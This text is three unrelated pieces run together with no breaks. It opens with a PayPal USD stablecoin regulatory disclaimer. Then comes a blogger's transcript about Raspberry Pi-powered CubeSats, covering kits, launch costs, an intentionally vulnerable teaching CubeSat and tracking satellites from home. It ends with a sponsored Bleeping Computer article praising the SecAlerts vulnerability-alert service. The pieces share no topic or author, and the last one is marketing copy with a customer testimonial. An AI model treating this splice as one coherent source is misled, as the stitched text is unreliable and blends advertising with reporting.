About PayPal USD (PYUSD)
PayPal USD is issued by Paxos Trust Company, LLC, a fully chartered limited purpose trust company. Paxos is licensed to engage in Virtual Currency Business Activity by the
New York State
Department of Financial Services. Reserves for PayPal USD are fully backed by U.S. dollar deposits, U.S. Treasuries and similar cash equivalents, and PayPal USD can be bought or sold through PayPal and Venmo at a rate of
$1.00
per PayPal USD.
PayPal, Inc. (NMLS ID #: 910457) is licensed to engage in Virtual Currency Business Activity by the
New York State
Department of Financial Services.
These are CubeSats. Satellites that are going to space—or at least, the ones I have here are
prototypes
. But these have one thing in common: they're all powered by either a Raspberry Pi, or a microcontroller.
There are already Pis in space, like on Mark Rober's
SatGus
, on
GASPACS
, and the
Astro Pis on the Space station
. Another Pi is going up
this weekend
, which is why I'm posting
this
today. I'll get to that one, but I wanted to spend some time talking about two things that fascinate me: Raspberry Pis, and putting them space!
In this post, I'll cover:
What is a CubeSat
Who builds and launches CubeSats
How
you
can build your own CubeSat
Then for a bonus, in today's video, I interviewed two people helping students launch SilverSat into space (this weekend!), and a YouTuber who I've learned a lot from about track satellites (including CubeSats) from your own backyard!
The rest of this post contains a lightly-edited transcript of the video above.
So let's dive in.
What's a CubeSat?
What's a CubeSat? Well, it's in the name—it's a satellite that's a cube!
But they don't have to be a cube, these smallest ones are '1U', or 10 x 10 x 10 centimeters. You can also find 2U CubeSats, like the taller Build a CubeSat, which is
20
centimeters tall. (Well, technically the current prototype is 1.5U).
SatGus
, Mark Rober's satellite taking space selfies, is a whopping
12U
! They needed all that extra space to fit a phone, a mechanism to
deploy
the phone, a camera to take the selfie, a Raspberry Pi to control the phone, and redundant systems for
everything
. They've already taken
thousands
of selfies, and SatGus has me beat. My best Pi might get to
3.4 Gigahertz
, but the Pi on SatGus is whizzing through space at almost
17,000 miles per hour
. That's
7,570 meters per second
for everyone else in the world.
But back to CubeSats. Having standards means you can build off existing work for the hard things, like a space-rated Aluminum frame, or the complex EPS, or Electrical Power System board.
Then you can add in custom parts, like a Pi to run experiments, a communications board with antennas and radios, cameras, sensors, and more!
And
these
cubesats have normal screw-on antennas, but the way these things are deployed, you only get 10x10x10 centimeters—you can't have an antenna poking out the top. So they use cool things like
flexible tape antennas
that pop out once your CubeSat deploys.
What else makes CubeSats cool?
Well, how about price? In the old days, you had to have like $10 million to build a satellite, and $60+ million to launch it into space.
Today, you can build a space-ready CubeSat using a few
thousand
dollars of parts. Then you can launch it on a rideshare for... well,
$85 grand
. Which is a
lot
, but it's not
$60 million-a-lot
.
So most of us won't be launching one of these things into space, unless maybe you can get a grant. But that doesn't mean they're not useful to us.
Who builds CubeSats?
Like with many projects, I love these things for the challenge, the way they break some of my assumptions, like working with Raspberry Pis.
If you're building a device that's less than 2 kilograms, has 1.8W of maximum continuous power draw, and needs to be operated remotely—even for just a month—you're immediately going to change your assumptions about how you build things.
I would hack Home Assistant onto a mini PC to monitor some sensors if I was feeling lazy—but that Mini PC would use an order of magnitude too much power for a CubeSat (much less the internal volume it would occupy).
On CubeSats, every millimeter, and every milliAmp has to be accounted for.
So to me, CubeSats are like Swiss watches of modern electronics. How many sensors can you fit in one? How much throughput can you get on a tiny radio with a small antenna? Can you get enough power out of tiny solar cells to keep the main flight computer working? How do you control thermals without air? How do you design it so it can recover from a complete power loss?
Every step of the way there are challenges; and that's before we even launch one! Someone who I think illustrates this best is Manuel, with his
Build a CubeSat
project. He's working on this Cubesat:
His first launch had many small problems. But also great learning, especially around redundancy and how to get the thing off the
launch
stand without problems.
And you're not only dealing with hardware, but also with
software
. And software that, at its core,
has
to be remotely accessed. And not only remote, but also
wireless
, meaning anyone
else
on earth within range can access it too.
So how do you keep it secure? That's something Tim from
Ethos Labs
is also dealing with with
this
, his T.E.M.P.E.S.T. CubeSat:
This thing is actually made to be
not
secure. It has intentional vulnerabilities, and he uses those to teach people different ways to make
their
CubeSats
more
secure.
You have complex hardware, running in limited space, with limited power and communications, and you want cram in as much functionality as possible.
Do you see where I'm going with this? That kind of problem is perfect for the microcontrollers and low-power SBCs that I love testing and playing with every day.
Except instead of me worrying about something consuming 10 watts, these guys are looking at a power budget of
one
watt. Or less!
These problems are
hard
. And not everyone has the patience for a completely custom project like Build a CubeSat, so there are also some small companies building
kits
to help you learn all these lessons with a little less stress.
Like what hardware do you need for a 100% self-contained CubeSat? And how do you get it certified for flight on a SpaceX rocket?
Your own CubeSat
Well, I'll quickly cover two products that are meant for like STEM classroom education, one from the lower end, and one that's based on a CubeSat that just flew this summer.
The first one is the
MySat Kit
, that you can buy from MySat in Ukraine. It comes with a board powered by an ESP32 with a camera, light sensors, an LED, gyroscope, accelerometer, barometer, clock, and a few other boards. And these are all off-the-shelf components you can buy replacements for or use 'em with other hardware, like a Raspberry Pi.
The way it's put together won't hold up on a rocket launch, but it's not meant for that. It's meant to show you how it's built, how you can communicate with it, and that sort of thing.
It took like an hour to build, and once I put it together I tried flashing the flight control firmware with my Mac... but I ran into some issues with Arduino IDE, and that's a
me
problem and not so much a MySat problem. Plus the team behind it has a whole war going on that they've been dealing with, so I'll be patient and try getting it going later.
The MySat goes from like $130 for a basic kit where you 3D print your own frame, or up to $300 for a full kit including deployable solar panels.
On the higher end, there's
RASCube
, and Edward Robinson, the 21 year old founder of Robinson Space, sent it over after he saw me posting about CubeSats online.
The RASCube comes from Australia, and Edward's mission is to teach students about space through hands-on building.
I just built this LS version of the cube last week; it's the little brother to their V2 design, which
flew in space
on a Falcon 9 rocket earlier this year.
Like MySat, you build the kit with an EPS board for power, a computer board with all the controls, and a radio board that ties in GPS and radio comms.
The RASCubes are a bit more expensive, coming in at around $430 each for the LB, and $600 each for the full aluminum V2s. But the price tag on that also covers full lesson plans and resources for teachers.
I love these things—all the people I've talked to on this journey are motivated by the same thing: learning about space, electronics, and integrating hardware in a new way, and sharing what they learn with others, especially students.
One thing I learned from the
first flight test
was how weird it is to have your Pi go from like overheating on the ground, to getting really cold as it goes higher, but then overheating again in the upper atmosphere because there's not enough air to dissipate heat!
You start to realize some of the crazy physical conditions you'll deal with on orbit.
Back down to earth, though, for CubeSat Tempest: the whole reason this exists is to help people learn why security is important, even for a tiny CubeSat. More importantly,
Tim Fowler's course
teaches people
how
to secure things like uplinks (see: the ground station pictured above) and flight control systems.
There are so many people like Tim, who work in their free time to try to teach about space, or engineering, or just small slices of things like security, using these tactile little cubes you can build and put next to your laptop on a desk.
It's crazy to think we're to a point where
students
can build these things, write flight control software, and even
launch 'em into space
!
There's another CubeSat with a Raspberry Pi onboard, and it's launching NET
Sunday
, at 6:11 p.m. Eastern time, aboard a Falcon 9 rocket. What does NET mean? Well, as I found out when I visited Florida this summer, that means "No Earlier Than", and in spaceflight, many things delay launches.
The students who built SilverSat are no strangers to delays—they were originally supposed to see their CubeSat launch earlier this year, but the cargo module they were on got
damaged during transport
, and that delayed them for
months
.
I got to talk to two of the adults guiding the students on their first space launch, and I discussed the history of the project (it started up in
2017
), how they are supported by NASA's
CubeSat Launch Initiative
, the importance of amateur radio for CubeSats, and why they chose a Raspberry Pi Zero for their onboard computer.
That interview is tucked away in the last half of the video at the top of this post.
Tracking Satellites from your backyard
Also in that video, I spoke to Gabe from
saveitforparts
, and he mentioned it's not that difficult to listen in on satellites on orbit—including amateur CubeSats!
SilverSat will be broadcasting
SSDV
(Slow-Scan Digital Video) at set times, and the
schedule for that
should be posted on their website.
Check out the video embedded in this post (near the top), or Gabe's own channel for ideas for tracking satellites. It can be done with under $100 of equipment (usually just an SDR and a cheap antenna).
Infectious Enthusiasm for Learning (and Teaching)
I feel like a broken record, but one thing I love, talking to
anyone
in the CubeSat community is this sense of infectious enthusiasm. And I was going to cut this video out for time, but watching it back, I realized other people would probably enjoy Tim showing off some neat CubeSats in his personal collection as much as I did. So I put up some bonus content on my second channel, Level 2 Jeff; you can watch another 8 minutes of CubeSat hardware below:
Thank you to
everyone
who taught me about CubeSats for this video and blog post.
Stop waiting on NVD — get real-time vulnerability alerts now
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 15:01:11
Vulnerabilities are discovered daily—but not every alert matters. SecAlerts pulls from 100+ sources for faster, real-time vuln alerts, filtering the noise so teams can patch quicker and stay secure. [...]...
In today’s fast-paced digital environment, cybersecurity is no longer optional - it’s essential. Vulnerability management has become a core component of every security strategy and keeping track of vulnerability alerts is an issue facing many businesses.
It doesn’t take much for even a small business to have hundreds, if not thousands of software across their systems. With nearly
10% of vulnerabilities exploited
in 2024, a business could easily have dozens of possible breaches in the offing if immediate remediation doesn’t occur.
Tracking every vulnerability update, alert and notification manually can be daunting and time-consuming. The last thing security officers and teams want is to be bombarded with vulnerability information. They require a service that saves them time and delivers relevant and actionable vuln info to them as soon as possible.
Traditional vulnerability management products are often expensive, complex, and difficult to implement, which acts as a barrier for businesses lacking either the security budget or teams. Not everyone needs a suite of products. Even when vulnerability alerts are catered for, there is the possibility of having to login to a product and search for the information.
Use filters to reduce the noise, so you receive relevant vulnerabilities.
Delivering What You Need
An alternative to offering a suite of products is to provide one streamlined, easy-to-use, affordable service.
SecAlerts does just that. It saves valuable time by delivering vulnerability alerts directly to you as soon as the information is released. Other services often rely solely on NVD and pass on any delays - often lengthy - that may occur. SecAlerts avoids wait times by using 100+ sources, including vendors, researchers, forums, and blogs, to provide up-to-the-minute vulnerability alerts.
Noise is one issue facing security personnel, who often have to wade through a mountain of vulnerability information. Spending time finding vulnerabilities that need to be dealt with can lead to delays updating software, leaving businesses open to attack.
SecAlerts allows you to filter out the noise, so you only receive vulnerability alerts you want to see. If, for example, you want to view critical Microsoft vulnerabilities with a CVSS of 8 - 10 that have been exploited in the past week, you can.
Create Alerts to notify you about new vulnerabilities matching your search criteria
How SecAlerts Works
SecAlerts breaks down the process of receiving vulnerability information into three core components – Stacks, Channels and Alerts:
Stacks:
Upload your software to SecAlerts from multiple endpoints, code repositories or a custom collection. This can be done manually, via a file (CSV, XLSX, SPDX) or a local scan (npm or curl), which runs a script on your endpoint and builds an SBOM.
Channels:
Choose who in your business receives the vulnerability information and how it is received – e.g. Email, Slack, Teams, Webhook.
Alerts:
Bring together your Stacks and Channels, so that the right people in your business receive relevant vulnerability information, delivered directly to them at a frequency of their choosing. It's here that you can reduce the noise with one or more filters, including Severity, Known Exploited, EPSS and Trending.
The Dashboard lets you see your vulnerability information in one location
Your Dashboard
Once you’ve added your software, all the relevant vulnerability information will populate your client Dashboard where, as well as your Stacks, Channels and Alerts, you can also see:
Vulnerabilities affecting your software over any period of time you choose.
Extended data for each vulnerability, including its origin e.g. Mitre, Github.
Which software and versions have been affected.
Reference links for each vulnerability.`
Our filters further allow you to edit down your vulnerabilities, so you only view the ones relevant to you.
If you look after e.g. several departments within your business, each with their own software, Properties is where you can give each department their own “page”, with Stacks, Channels, Alerts unique to them.
Properties is especially popular with MSPs wanting to handle their clients in one place.
Each Property contains its own vulnerability information, including Stacks, Channels and Alerts.
Game-Changer
SecAlerts’ global client-base covers five continents and a wide range of industries and businesses, including universities, intelligence agencies, startups, banks, government departments, aviation and cyber insurers.
Many of these businesses incorporate SecAlerts into their cyber security arsenal alongside other products, due to its easy-to-use functionality and the ability to filter out the noise and deliver relevant, actionable, up-to-the-minute vulnerability alerts directly to them – all at an affordable price.
"Staying ahead of vulnerabilities is critical and SecAlerts has been an absolute game-changer,"
shared a UK customer.
"It provides real-time alerts on security threats based on our requirements, helping us proactively address risks before they become major issues. We’ve strengthened our security posture and improved response times significantly."